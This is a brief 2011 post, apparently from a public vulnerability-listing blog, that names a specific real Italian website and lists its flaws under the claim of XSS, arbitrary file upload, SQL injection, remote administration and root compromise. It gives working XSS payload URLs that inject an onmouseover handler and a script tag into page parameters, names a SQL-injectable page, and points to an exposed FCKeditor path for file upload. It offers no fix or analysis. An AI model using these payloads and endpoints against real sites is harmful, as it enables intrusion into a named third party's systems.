Tuesday, 31 May 2011

http://www.asiabenevento.it | XSS, arbitrary file upload, SQL injection, remote administration, root compromise

-XSS-
http://www.asiabenevento.it/asiastrade/strade.php?vcercaStra=" onmouseover=alert("xss") bla="
http://www.asiabenevento.it/vedifoto.php?foto=immagini/ASIAalta.jpg&vDidascalia=&vTitolo=1%3Cscript%3Ealert%281%29;%3C/script%3E

-SQL injection-
http://www.asiabenevento.it/asiastrade/strade.php

-arbitrary file upload-
http://www.asiabenevento.it/fckeditor/